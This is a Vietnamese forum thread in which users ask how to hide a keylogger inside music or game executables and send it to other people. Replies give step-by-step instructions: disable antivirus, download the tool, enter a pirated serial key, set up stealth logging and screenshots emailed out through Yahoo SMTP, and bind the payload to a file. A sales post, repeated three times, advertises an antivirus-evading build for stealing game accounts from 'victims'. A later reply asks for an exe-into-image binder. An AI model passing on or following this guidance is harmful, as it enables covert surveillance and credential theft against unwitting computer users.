Cách cài đặt Blazzing Tool Perfect Keylogger ?

Em chào các anh chị, có ai biết cách cài đặt và sử dụng phần mềm vừa chính vừa tà Blazzing Tool Perfect Keylogger không? Cách cài đặt sillence keylog vào một file nào đó chẳng hạn file nhạc file trò chơi dạng thực thi (file .exe) để gửi cái email file này đến máy tính của người khác khi click vào là ta đã cài đặt thành công keylog trên máy này rồi. Chỉ cho em biết với. Cám ơn mọi người rất nhiều...
thuy linh
Trả lời 14 năm trước
Dùng những phần mềm như vậy không tốt đâu, rất có thể chính bạn lại bị người khác theo dõi nữa đó. Tốt nhât là không nên dùng.
ldfhd dflhkj dfhlkj
Trả lời 12 năm trước

Trước hết. các bạn hãy tắt tất cả chương trình anti-virus

Link download: http://www.mediafire.com/?c5on7hgoi7yxdbl

Các bạn download về cài đặt như bình thường. Sau khi cài đặt sẽ thông báo bảng. các bạn chọn điền Key vào.

Name : ttt28xx

Key : SGJO - QGST - OVAY - UCNR

tiếp theo là cách gắn vào file:

ở thanh công cụ bên dưới góc phải màn hình có biếu tượng cuộn phim. các bạn kích phải chọn Options.

Ở mục Gereral các bạn tick tất cả các ô ở phần system. thay đổi phím tắt theo ý mình.

Ở mục Logging các bạn cài đặt mật khẩu.

Mục Creenshots: các bạn chọn theo thời gian mà keylog gửi về mail.

Picture quality là chất lượng hình ảnh (càng rõ thì càng nặng).

Ở mục Email: tick Try to send logs by e-nail every...

chuyển sang tab Delivery:

Ô trên cùng các bạn đặt email của bạn.

ô SMTP: các bạn điền smtp.mail.yahoo.com nếu email của bạn là .com và smtp.mail.yahoo.com.vn nếu email của bạn là .com.vn.!

Username: nick yahoo

Password: mật khẩu yahoo.

ấn Send Test. hiện ra test message war sent succesfully là ok.

Ấn ok.

Kích phải vào cuộn phim. chọn Remote...

Next liên tục. đến khi hiện bảng thì bạn chọn file muốn gắn keylog vào. vậy là đã hoàn hành.

Chúc các bạn thành công !

Nguyen Nguyen
Trả lời 11 năm trước

Bạn dùng phần mềm này nha http://www.mediafire.com/?l6jf1mbnwla8xc8 pass giải nén 123 (kéo thả link lên trình duyệt để tải nha)

tan hung
Trả lời 10 năm trước

Bán Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail
Hiện tại mình có thể cài đặt Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail hiệu quả 100% tuyệt đối.
Các bạn có thể liên hệ với mình qua nick yahoo: it.tony13
Mình đảm bảo Perfect Keylogger 2013 đã được tối ưu có thể qua mặt hầu hết các phần mềm diệt Virus có bản quyền, còn loại Free thì khỏi nói. Các bạn có thể lấy trộm các tài khoản Game online , thông tin các loại nếu bạn muốn cài đặt trên máy nào đó
Cách làm: các bạn yêu cầu gửi về Gmail hay Email nào của các bạn mình sẽ tạo 1 con để Test thẳng vào Gmail cho các bạn thấy. Mình đã làm cho nhiều người chơi game online và có uy tín. Mình sẽ hướng dẫn cho các bạn cách cài đặt cho victim dính keylogger 1 cách dễ dàng. Sau khi giao dịch xong mình sẽ gửi link File keylogger đã tạo cho các bạn dùng. Thời hạn dùng keylogger là mãi mãi.
Đây là gmail của mình mới lập 3 ngày mà đã có 15.000 thư gửi về. Các bạn thấy thế nào.
[IMG]http://photo.ssc.vn/images/300anh_gmail.jpg[/IMG]
Giao diện xem log dễ dàng và siêu nhanh với Gmail
[IMG]http://photo.ssc.vn/images/768mail2.jpg[/IMG]
Nói sơ qua về Perfect Keylogger cho các bạn chưa hiểu nhé: ( dịch qua Google nên hơi khó hiểu)
Bạn có muốn biết những gì bạn bè của bạn hoặc đồng nghiệp đang làm trực tuyến? Hoặc có thể bạn muốn kiểm tra về trẻ em hoặc người phối ngẫu của bạn và biết những gì họ đang làm trên máy tính? Với Perfect Keylogger có thể chỉ trong 2 phút! Chương trình này chạy trên các máy tính cài đặt, ẩn hoàn toàn từ người sử dụng, và ghi tất cả mọi thứ được gõ vào một tập tin được bảo vệ. Cài đặt Perfect Keylogger và tìm hiểu những thử thách!
Perfect Keylogger là một keylogger thế hệ mới đó là hầu như không thể phát hiện. Nó được tạo ra để thay thế cho các sản phẩm thương mại rất tốn kém như Spector Keylogger hoặc E-Blaster. Nó có một chức năng tương tự, nhưng là dễ dàng hơn đáng kể để sử dụng. Các cơ chế nội bộ phức tạp được ẩn từ người sử dụng sau giao diện thân thiện. Bạn có thể cài đặt Keylogger và sử dụng nó ngay lập tức mà không rối tung với các thiết lập.
Perfect Keylogger là một công cụ được trao giải thưởng phổ biến, dịch sang 20 ngôn ngữ +. Nó cho phép bạn ghi lại tất cả thao tác bàn phím, thời gian họ đã được thực hiện và các ứng dụng mà họ đã nhập vào. Nó hoạt động trong chế độ ẩn hoàn toàn. Stealth mode có nghĩa là không có nút hoặc biểu tượng nào hiện trên thanh task bar, và không có tên chương trình xuất hiện trong danh sách Task Manager.
Hơn nữa, Perfect Keylogger có thể tiến hành giám sát trực. Định kỳ làm cho ảnh chụp màn hình ở chế độ ẩn và lưu trữ các ảnh nén vào đĩa để bạn có thể xem lại chúng sau này.
Keylogger của chúng tôi có tính năng cài đặt từ xa. Bạn có thể tạo ra một gói phần mềm được cấu hình sẵn để ngay lập tức và tàng hình cài đặt trên máy tính mục tiêu.
Mới thông minh tính năng Đổi tên cho phép bạn đổi tên tập tin thực thi tất cả của keylogger và mục đăng ký sử dụng một từ khóa!
Một trong những tính năng mạnh mẽ nhất của Perfect Keylogger là phát hiện từ khoá cao cấp và thông báo. Tạo ra một danh sách các "cảnh báo" từ hoặc cụm từ và keylogger sẽ liên tục theo dõi bàn phím, các URL và các trang web để tìm kiếm từ hoặc cụm từ. Bạn nói với Perfect Keylogger mà cụm từ để xem ra cho - ví dụ, "tình dục", "khiêu dâm", "nơi nào bạn sống", "là nhà cha mẹ của bạn", "là bạn ngủ vợ", "tôi ghét ông chủ của tôi" - bất cứ điều gì bạn quyết định bao gồm. Khi một từ khóa được phát hiện, Perfect Keylogger làm cho ảnh chụp màn hình và ngay lập tức gửi email thông báo cho bạn.
Perfect Keylogger là giải pháp phần mềm keylogging đầu tiên mà có thể là hoàn toàn vô hình trong Windows 7/Vista/XP Task Manager Bây giờ chúng tôi rất vui mừng để cung cấp sự hỗ trợ đầy đủ Windows 64 bit - bạn sẽ không tìm thấy nó trong hầu hết các sản phẩm cạnh tranh.
Chương trình cho phép bạn dễ dàng xem các tập tin đăng nhập, hiển thị tiêu đề của cửa sổ (ví dụ, tiêu đề: "John (Online) - Tin Session" trong Yahoo IM), ngày và thời gian của hành động và các nội dung của vấn đề đánh máy chính nó.
Perfect Keylogger có sẵn trong ba phiên bản: phiên bản đầy đủ, đầy đủ phiên bản từ xa phiên bản và phiên bản cơ bản. Lựa chọn các chức năng bạn cần.
Bán Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail
Hiện tại mình có thể cài đặt Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail hiệu quả 100% tuyệt đối.
Các bạn có thể liên hệ với mình qua nick yahoo: it.tony13
Mình đảm bảo Perfect Keylogger 2013 đã được tối ưu có thể qua mặt hầu hết các phần mềm diệt Virus có bản quyền, còn loại Free thì khỏi nói. Các bạn có thể lấy trộm các tài khoản Game online , thông tin các loại nếu bạn muốn cài đặt trên máy nào đó
Cách làm: các bạn yêu cầu gửi về Gmail hay Email nào của các bạn mình sẽ tạo 1 con để Test thẳng vào Gmail cho các bạn thấy. Mình đã làm cho nhiều người chơi game online và có uy tín. Mình sẽ hướng dẫn cho các bạn cách cài đặt cho victim dính keylogger 1 cách dễ dàng. Sau khi giao dịch xong mình sẽ gửi link File keylogger đã tạo cho các bạn dùng. Thời hạn dùng keylogger là mãi mãi.
Đây là gmail của mình mới lập 3 ngày mà đã có 15.000 thư gửi về. Các bạn thấy thế nào.
[IMG]http://photo.ssc.vn/images/300anh_gmail.jpg[/IMG]
Giao diện xem log dễ dàng và siêu nhanh với Gmail
[IMG]http://photo.ssc.vn/images/768mail2.jpg[/IMG]
Nói sơ qua về Perfect Keylogger cho các bạn chưa hiểu nhé: ( dịch qua Google nên hơi khó hiểu)
Bạn có muốn biết những gì bạn bè của bạn hoặc đồng nghiệp đang làm trực tuyến? Hoặc có thể bạn muốn kiểm tra về trẻ em hoặc người phối ngẫu của bạn và biết những gì họ đang làm trên máy tính? Với Perfect Keylogger có thể chỉ trong 2 phút! Chương trình này chạy trên các máy tính cài đặt, ẩn hoàn toàn từ người sử dụng, và ghi tất cả mọi thứ được gõ vào một tập tin được bảo vệ. Cài đặt Perfect Keylogger và tìm hiểu những thử thách!
Perfect Keylogger là một keylogger thế hệ mới đó là hầu như không thể phát hiện. Nó được tạo ra để thay thế cho các sản phẩm thương mại rất tốn kém như Spector Keylogger hoặc E-Blaster. Nó có một chức năng tương tự, nhưng là dễ dàng hơn đáng kể để sử dụng. Các cơ chế nội bộ phức tạp được ẩn từ người sử dụng sau giao diện thân thiện. Bạn có thể cài đặt Keylogger và sử dụng nó ngay lập tức mà không rối tung với các thiết lập.
Perfect Keylogger là một công cụ được trao giải thưởng phổ biến, dịch sang 20 ngôn ngữ +. Nó cho phép bạn ghi lại tất cả thao tác bàn phím, thời gian họ đã được thực hiện và các ứng dụng mà họ đã nhập vào. Nó hoạt động trong chế độ ẩn hoàn toàn. Stealth mode có nghĩa là không có nút hoặc biểu tượng nào hiện trên thanh task bar, và không có tên chương trình xuất hiện trong danh sách Task Manager.
Hơn nữa, Perfect Keylogger có thể tiến hành giám sát trực. Định kỳ làm cho ảnh chụp màn hình ở chế độ ẩn và lưu trữ các ảnh nén vào đĩa để bạn có thể xem lại chúng sau này.
Keylogger của chúng tôi có tính năng cài đặt từ xa. Bạn có thể tạo ra một gói phần mềm được cấu hình sẵn để ngay lập tức và tàng hình cài đặt trên máy tính mục tiêu.
Mới thông minh tính năng Đổi tên cho phép bạn đổi tên tập tin thực thi tất cả của keylogger và mục đăng ký sử dụng một từ khóa!
Một trong những tính năng mạnh mẽ nhất của Perfect Keylogger là phát hiện từ khoá cao cấp và thông báo. Tạo ra một danh sách các "cảnh báo" từ hoặc cụm từ và keylogger sẽ liên tục theo dõi bàn phím, các URL và các trang web để tìm kiếm từ hoặc cụm từ. Bạn nói với Perfect Keylogger mà cụm từ để xem ra cho - ví dụ, "tình dục", "khiêu dâm", "nơi nào bạn sống", "là nhà cha mẹ của bạn", "là bạn ngủ vợ", "tôi ghét ông chủ của tôi" - bất cứ điều gì bạn quyết định bao gồm. Khi một từ khóa được phát hiện, Perfect Keylogger làm cho ảnh chụp màn hình và ngay lập tức gửi email thông báo cho bạn.
Perfect Keylogger là giải pháp phần mềm keylogging đầu tiên mà có thể là hoàn toàn vô hình trong Windows 7/Vista/XP Task Manager Bây giờ chúng tôi rất vui mừng để cung cấp sự hỗ trợ đầy đủ Windows 64 bit - bạn sẽ không tìm thấy nó trong hầu hết các sản phẩm cạnh tranh.
Chương trình cho phép bạn dễ dàng xem các tập tin đăng nhập, hiển thị tiêu đề của cửa sổ (ví dụ, tiêu đề: "John (Online) - Tin Session" trong Yahoo IM), ngày và thời gian của hành động và các nội dung của vấn đề đánh máy chính nó.
Perfect Keylogger có sẵn trong ba phiên bản: phiên bản đầy đủ, đầy đủ phiên bản từ xa phiên bản và phiên bản cơ bản. Lựa chọn các chức năng bạn cần.

Bán Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail

Hiện tại mình có thể cài đặt Perfect Keylogger phiên bản mới nhất 2013 dùng gửi về Gmail hiệu quả 100% tuyệt đối.

Các bạn có thể liên hệ với mình qua nick yahoo: it.tony13

Mình đảm bảo Perfect Keylogger 2013 đã được tối ưu có thể qua mặt hầu hết các phần mềm diệt Virus có bản quyền, còn loại Free thì khỏi nói. Các bạn có thể lấy trộm các tài khoản Game online , thông tin các loại nếu bạn muốn cài đặt trên máy nào đó

Cách làm: các bạn yêu cầu gửi về Gmail hay Email nào của các bạn mình sẽ tạo 1 con để Test thẳng vào Gmail cho các bạn thấy. Mình đã làm cho nhiều người chơi game online và có uy tín. Mình sẽ hướng dẫn cho các bạn cách cài đặt cho victim dính keylogger 1 cách dễ dàng. Sau khi giao dịch xong mình sẽ gửi link File keylogger đã tạo cho các bạn dùng. Thời hạn dùng keylogger là mãi mãi.

Đây là gmail của mình mới lập 3 ngày mà đã có 15.000 thư gửi về. Các bạn thấy thế nào.

[IMG]http://photo.ssc.vn/images/300anh_gmail.jpg[/IMG]

Giao diện xem log dễ dàng và siêu nhanh với Gmail

[IMG]http://photo.ssc.vn/images/768mail2.jpg[/IMG]

Nói sơ qua về Perfect Keylogger cho các bạn chưa hiểu nhé: ( dịch qua Google nên hơi khó hiểu)

Bạn có muốn biết những gì bạn bè của bạn hoặc đồng nghiệp đang làm trực tuyến? Hoặc có thể bạn muốn kiểm tra về trẻ em hoặc người phối ngẫu của bạn và biết những gì họ đang làm trên máy tính? Với Perfect Keylogger có thể chỉ trong 2 phút! Chương trình này chạy trên các máy tính cài đặt, ẩn hoàn toàn từ người sử dụng, và ghi tất cả mọi thứ được gõ vào một tập tin được bảo vệ. Cài đặt Perfect Keylogger và tìm hiểu những thử thách!

Perfect Keylogger là một keylogger thế hệ mới đó là hầu như không thể phát hiện. Nó được tạo ra để thay thế cho các sản phẩm thương mại rất tốn kém như Spector Keylogger hoặc E-Blaster. Nó có một chức năng tương tự, nhưng là dễ dàng hơn đáng kể để sử dụng. Các cơ chế nội bộ phức tạp được ẩn từ người sử dụng sau giao diện thân thiện. Bạn có thể cài đặt Keylogger và sử dụng nó ngay lập tức mà không rối tung với các thiết lập.

Perfect Keylogger là một công cụ được trao giải thưởng phổ biến, dịch sang 20 ngôn ngữ +. Nó cho phép bạn ghi lại tất cả thao tác bàn phím, thời gian họ đã được thực hiện và các ứng dụng mà họ đã nhập vào. Nó hoạt động trong chế độ ẩn hoàn toàn. Stealth mode có nghĩa là không có nút hoặc biểu tượng nào hiện trên thanh task bar, và không có tên chương trình xuất hiện trong danh sách Task Manager.

Hơn nữa, Perfect Keylogger có thể tiến hành giám sát trực. Định kỳ làm cho ảnh chụp màn hình ở chế độ ẩn và lưu trữ các ảnh nén vào đĩa để bạn có thể xem lại chúng sau này.

Keylogger của chúng tôi có tính năng cài đặt từ xa. Bạn có thể tạo ra một gói phần mềm được cấu hình sẵn để ngay lập tức và tàng hình cài đặt trên máy tính mục tiêu.

Mới thông minh tính năng Đổi tên cho phép bạn đổi tên tập tin thực thi tất cả của keylogger và mục đăng ký sử dụng một từ khóa!

Một trong những tính năng mạnh mẽ nhất của Perfect Keylogger là phát hiện từ khoá cao cấp và thông báo. Tạo ra một danh sách các "cảnh báo" từ hoặc cụm từ và keylogger sẽ liên tục theo dõi bàn phím, các URL và các trang web để tìm kiếm từ hoặc cụm từ. Bạn nói với Perfect Keylogger mà cụm từ để xem ra cho - ví dụ, "tình dục", "khiêu dâm", "nơi nào bạn sống", "là nhà cha mẹ của bạn", "là bạn ngủ vợ", "tôi ghét ông chủ của tôi" - bất cứ điều gì bạn quyết định bao gồm. Khi một từ khóa được phát hiện, Perfect Keylogger làm cho ảnh chụp màn hình và ngay lập tức gửi email thông báo cho bạn.

Perfect Keylogger là giải pháp phần mềm keylogging đầu tiên mà có thể là hoàn toàn vô hình trong Windows 7/Vista/XP Task Manager Bây giờ chúng tôi rất vui mừng để cung cấp sự hỗ trợ đầy đủ Windows 64 bit - bạn sẽ không tìm thấy nó trong hầu hết các sản phẩm cạnh tranh.

Chương trình cho phép bạn dễ dàng xem các tập tin đăng nhập, hiển thị tiêu đề của cửa sổ (ví dụ, tiêu đề: "John (Online) - Tin Session" trong Yahoo IM), ngày và thời gian của hành động và các nội dung của vấn đề đánh máy chính nó.

Perfect Keylogger có sẵn trong ba phiên bản: phiên bản đầy đủ, đầy đủ phiên bản từ xa phiên bản và phiên bản cơ bản. Lựa chọn các chức năng bạn cần.

Trắng Xóa
Trả lời 8 năm trước

có bác nào có link tool gắn exe vào ảnh không cho em xin với ạ